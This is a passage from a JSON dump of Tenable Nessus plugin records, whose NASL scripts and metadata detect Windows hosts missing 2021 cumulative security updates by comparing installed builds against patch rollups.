["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007206.NASL", "href": "https://www.tenable.com/plugins/nessus/154993", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154993);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2021-26443\",\n \"CVE-2021-36957\",\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41351\",\n \"CVE-2021-41356\",\n \"CVE-2021-41366\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41378\",\n \"CVE-2021-41379\",\n \"CVE-2021-42274\",\n \"CVE-2021-42275\",\n \"CVE-2021-42276\",\n \"CVE-2021-42277\",\n \"CVE-2021-42278\",\n \"CVE-2021-42279\",\n \"CVE-2021-42280\",\n \"CVE-2021-42282\",\n \"CVE-2021-42283\",\n \"CVE-2021-42284\",\n \"CVE-2021-42285\",\n \"CVE-2021-42287\",\n \"CVE-2021-42288\",\n \"CVE-2021-42291\"\n );\n script_xref(name:\"MSKB\", value:\"5007206\");\n script_xref(name:\"MSFT\", value:\"MS21-5007206\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0544-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/02\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0053\");\n\n script_name(english:\"KB5007206: Windows 10 Version 1809 and Windows Server 2019 Security Update (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5007206.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. 
(CVE-2021-26443,\n CVE-2021-38666, CVE-2021-41378, CVE-2021-42275,\n CVE-2021-42276, CVE-2021-42279)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-38631, CVE-2021-38665,\n CVE-2021-41371)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367,\n CVE-2021-41370, CVE-2021-41377, CVE-2021-41379,\n CVE-2021-42277, CVE-2021-42278, CVE-2021-42280,\n CVE-2021-42282, CVE-2021-42283, CVE-2021-42285,\n CVE-2021-42287, CVE-2021-42291)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-42288)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. 
(CVE-2021-41356,\n CVE-2021-42274, CVE-2021-42284)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007206\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5007206.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26443\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-11\";\nkbs = make_list('5007206');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'17763',\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007206])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-21T14:07:27", "description": "The remote Windows host is missing security update 5005033.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-26431, CVE-2021-34483, CVE-2021-34484, CVE-2021-34486, CVE-2021-34487, CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - A remote code execution vulnerability. 
An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34530, CVE-2021-34533, CVE-2021-34534, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005033: Windows 10 Version 2004 / Windows 10 Version 20H2 / Windows 10 Version 21H1 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26431", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005033.NASL", "href": "https://www.tenable.com/plugins/nessus/152431", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152431);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26431\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34486\",\n \"CVE-2021-34487\",\n \"CVE-2021-34530\",\n \"CVE-2021-34533\",\n \"CVE-2021-34534\",\n \"CVE-2021-34535\",\n \"CVE-2021-34536\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36947\",\n \"CVE-2021-36948\"\n );\n script_xref(name:\"MSKB\", value:\"5005033\");\n script_xref(name:\"MSFT\", value:\"MS21-5005033\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005033: Windows 10 Version 2004 / Windows 10 Version 20H2 / Windows 10 Version 21H1 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005033.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. 
An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-26431,\n CVE-2021-34483, CVE-2021-34484, CVE-2021-34486,\n CVE-2021-34487, CVE-2021-34536, CVE-2021-34537,\n CVE-2021-36948)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34530, CVE-2021-34533,\n CVE-2021-34534, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005033-os-builds-19041-1165-19042-1165-and-19043-1165-b4c77d08-435a-4833-b9f7-e092372079a4\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?526975a8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005033.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin = 'MS21-08';\nvar kbs = make_list(\n '5005033'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nvar share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:19041,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005033])\n||\n smb_check_rollup(os:'10', \n sp:0,\n os_build:19042,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005033])\n||\n smb_check_rollup(os:'10', \n sp:0,\n os_build:19043,\n rollup_date:'08_2021',\n bulletin:bulletin,\n 
rollup_kb_list:[5005033])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:32:50", "description": "The remote Windows host is missing security update 5005043.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34530, CVE-2021-34533, CVE-2021-34534, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-34487, CVE-2021-34536, CVE-2021-34537)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. 
(CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005043: Windows 10 Version 1607 and Windows Server 2016 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36938", "CVE-2021-36942", "CVE-2021-36947"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005043.NASL", "href": "https://www.tenable.com/plugins/nessus/152434", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152434);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34487\",\n \"CVE-2021-34530\",\n \"CVE-2021-34533\",\n \"CVE-2021-34534\",\n \"CVE-2021-34535\",\n \"CVE-2021-34536\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36938\",\n \"CVE-2021-36942\",\n \"CVE-2021-36947\"\n );\n script_xref(name:\"MSKB\", value:\"5005043\");\n script_xref(name:\"MSFT\", value:\"MS21-5005043\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005043: Windows 10 Version 1607 and Windows Server 2016 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005043.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34530, CVE-2021-34533,\n CVE-2021-34534, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - A session spoofing vulnerability exists. 
An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483,\n CVE-2021-34484, CVE-2021-34487, CVE-2021-34536,\n CVE-2021-34537)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005043-os-build-14393-4583-709d481e-b02a-4eb9-80d9-75c4b8170240\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e5193663\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005043.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005043'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:14393,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005043])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:25:12", "description": "The remote Windows host is missing security update 4601319.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. 
An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-1734, CVE-2021-24076, CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-24075, CVE-2021-24080, CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-1722, CVE-2021-24074, CVE-2021-24077, CVE-2021-24081, CVE-2021-24083, CVE-2021-24088, CVE-2021-24091, CVE-2021-24093, CVE-2021-24094)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732, CVE-2021-24096, CVE-2021-24102, CVE-2021-24103, CVE-2021-25195)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application. 
(CVE-2021-1731, CVE-2021-24082)", "cvss3": {}, "published": "2021-02-09T00:00:00", "type": "nessus", "title": "KB4601319: Windows 10 version 2004 Feb 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1698", "CVE-2021-1722", "CVE-2021-1727", "CVE-2021-1731", "CVE-2021-1732", "CVE-2021-1734", "CVE-2021-24074", "CVE-2021-24075", "CVE-2021-24076", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24079", "CVE-2021-24080", "CVE-2021-24081", "CVE-2021-24082", "CVE-2021-24083", "CVE-2021-24084", "CVE-2021-24086", "CVE-2021-24088", "CVE-2021-24091", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24096", "CVE-2021-24098", "CVE-2021-24102", "CVE-2021-24103", "CVE-2021-24106", "CVE-2021-25195"], "modified": "2023-01-20T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_FEB_4601319.NASL", "href": "https://www.tenable.com/plugins/nessus/146345", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146345);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/20\");\n\n script_cve_id(\n \"CVE-2021-1698\",\n \"CVE-2021-1722\",\n \"CVE-2021-1727\",\n \"CVE-2021-1731\",\n \"CVE-2021-1732\",\n \"CVE-2021-1734\",\n \"CVE-2021-24074\",\n \"CVE-2021-24075\",\n \"CVE-2021-24076\",\n \"CVE-2021-24077\",\n \"CVE-2021-24078\",\n \"CVE-2021-24079\",\n \"CVE-2021-24080\",\n \"CVE-2021-24081\",\n \"CVE-2021-24082\",\n \"CVE-2021-24083\",\n \"CVE-2021-24084\",\n \"CVE-2021-24086\",\n \"CVE-2021-24088\",\n \"CVE-2021-24091\",\n \"CVE-2021-24093\",\n \"CVE-2021-24094\",\n \"CVE-2021-24096\",\n \"CVE-2021-24098\",\n \"CVE-2021-24102\",\n \"CVE-2021-24103\",\n \"CVE-2021-24106\",\n \"CVE-2021-25195\"\n );\n script_xref(name:\"MSKB\", value:\"4601319\");\n script_xref(name:\"MSFT\", value:\"MS21-4601319\");\n script_xref(name:\"IAVA\", value:\"2021-A-0072-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0093-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB4601319: Windows 10 version 2004 Feb 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4601319.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1734, CVE-2021-24076,\n CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. 
(CVE-2021-24075,\n CVE-2021-24080, CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1722,\n CVE-2021-24074, CVE-2021-24077, CVE-2021-24081,\n CVE-2021-24083, CVE-2021-24088, CVE-2021-24091,\n CVE-2021-24093, CVE-2021-24094)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732,\n CVE-2021-24096, CVE-2021-24102, CVE-2021-24103,\n CVE-2021-25195)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1731,\n CVE-2021-24082)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4601319\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB4601319 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-24094\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", 
